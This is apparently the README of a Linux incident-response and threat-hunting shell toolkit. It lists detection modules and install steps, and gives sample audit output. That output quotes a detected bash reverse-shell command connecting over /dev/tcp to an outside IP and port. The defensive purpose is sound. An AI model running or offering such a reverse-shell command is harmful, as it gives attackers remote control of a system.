__ ______ __ / /_ ______ ____ _ / ____/_ ______ ___________/ / / / / / / __ \/ __ `/ / / __/ / / / __ `/ ___/ __ / / / /_/ / / / / /_/ / / /_/ / /_/ / /_/ / / / /_/ / /_/\__, /_/ /_/\__,_/ \____/\__,_/\__,_/_/ \__,_/ /____/
Linux 风险自查与应急响应框架
⚡ Lightweight · 🔥 Offensive-Aware · 🛡 Blue-Team Ready · 🚨 Threat Hunting
专为 Linux 安全运维、蓝队、应急响应与安全研究人员打造的下一代安全巡检工具。
LynaGuard 是一个专注于 Linux 安全自查、威胁狩猎(Threat Hunting)与应急响应(Incident Response)的轻量级安全框架。
无需安装第三方依赖,仅通过 Shell 即可自动化分析系统痕迹,快速发现:
- 反弹 Shell
- WebShell
- 挖矿木马
- SSH 后门
- 恶意进程
- 持久化机制
- 凭据泄露
- 异常网络连接
- Bash 历史命令风险
- Root 权限异常
- 可疑定时任务
适用于:
- 🛡 蓝队 / SOC
- ☁ 云服务器安全巡检
- 🔥 红队后渗透排查
- 🧠 威胁狩猎
- 🔎 Linux 应急响应
- 🐧 运维安全基线检查
- Reverse Shell 检测
- Bash 内存载荷分析
- 异常高 CPU 进程检测
- 挖矿木马识别
- 恶意网络连接分析
- 可疑端口发现
- SSH 后门排查
- Linux 快速主机排查
- IOC 自动化收集
- 持久化后门检测
- Crontab 分析
- Systemd 服务排查
- 启动项审计
- SSH 安全评估
- Bash 历史命令分析
- 明文密码泄漏检测
- 登录行为分析
- sudo 提权审计
- 异常账号检查
- 网络连接枚举
- 敏感文件扫描
- PHP WebShell 扫描
- 危险函数检测
- Base64 编码恶意载荷分析
- 混淆木马关键字识别
__ ______ __
/ /_ ______ ____ _ / ____/_ ______ ___________/ /
/ / / / / __ \/ __ `/ / / __/ / / / __ `/ ___/ __ /
/ / /_/ / / / / /_/ / / /_/ / /_/ / /_/ / / / /_/ /
/_/\__, /_/ /_/\__,_/ \____/\__,_/\__,_/_/ \__,_/
/____/
[+] [2026-05-19 14:19:23] Initialization completed. Running as root...
--------------------------------------------------------------------------------
[🔥] STEP 1: Analyzing Bash Histories & Leakage...
[!] CRITICAL: Found plaintext password in /root/.bash_history
[!] WARNING: History file size abnormally large or recently cleared.
[💀] STEP 2: Hunting Backdoors & Reverse Shells...
[🚨] ALERT: Active reverse shell detected!
-> PID: 18293 | bash -i >& /dev/tcp/1.2.3.4/4444 0>&1
[⛏️] STEP 3: Detecting Malicious & Crypto-Mining Activity...
[🚨] ALERT: High CPU anomaly detected.
[!] CRITICAL: Found stratum mining protocol string in process memory.
[🔒] STEP 4: Evaluating Account & Password Security...
[!] WARNING: Empty password field detected in /etc/shadow.
--------------------------------------------------------------------------------
[📊] AUDIT SUMMARY:
● Critical Risks: 3
● Warnings: 4
● System Status: COMPROMISED ❌
LynaGuard/
├── lynaguard.sh
├── modules/
│ ├── system_info.sh
│ ├── user_audit.sh
│ ├── network_audit.sh
│ ├── process_audit.sh
│ ├── persistence_audit.sh
│ ├── webshell_scan.sh
│ ├── miner_scan.sh
│ ├── log_audit.sh
│ └── report.sh
├── reports/
└── README.mdgit clone https://github.com/YOUR_USERNAME/LynaGuard.git
cd LynaGuardchmod +x lynaguard.sh
chmod +x modules/*.shsudo bash lynaguard.sh| 功能 | 支持 |
|---|---|
| Reverse Shell 检测 | ✅ |
| 挖矿木马检测 | ✅ |
| WebShell 扫描 | ✅ |
| SSH 安全审计 | ✅ |
| Bash 历史分析 | ✅ |
| 持久化后门检测 | ✅ |
| 定时任务排查 | ✅ |
| 异常进程检测 | ✅ |
| 高 CPU 占用分析 | ✅ |
| 凭据泄漏检测 | ✅ |
| IOC 收集 | ✅ |
- Linux 应急响应
- 云服务器安全巡检
- 安全运维自查
- 红队后渗透排查
- 蓝队威胁狩猎
- 主机安全加固
- WebShell 排查
- 挖矿木马清理
- 企业安全基线检查
未来版本计划支持:
- YARA 恶意规则扫描
- Rootkit 检测
- Docker / Kubernetes 审计
- Threat Intelligence 威胁情报
- Telegram / Discord 告警
- JSON 报告输出
- ELK / Splunk 集成
- AI 威胁分析
- Linux 基线合规检查
- 内存 IOC 扫描
本项目仅允许用于:
- 合法授权安全测试
- 应急响应
- 安全研究
- 防御性安全审计
禁止将本工具用于任何未授权攻击行为。
如果这个项目对你有帮助,欢迎点一个 ⭐ Star 支持。
🔥 Built for Blue Teams · DFIR · Linux Security Engineers
专注 Linux 安全 · 应急响应 · 威胁狩猎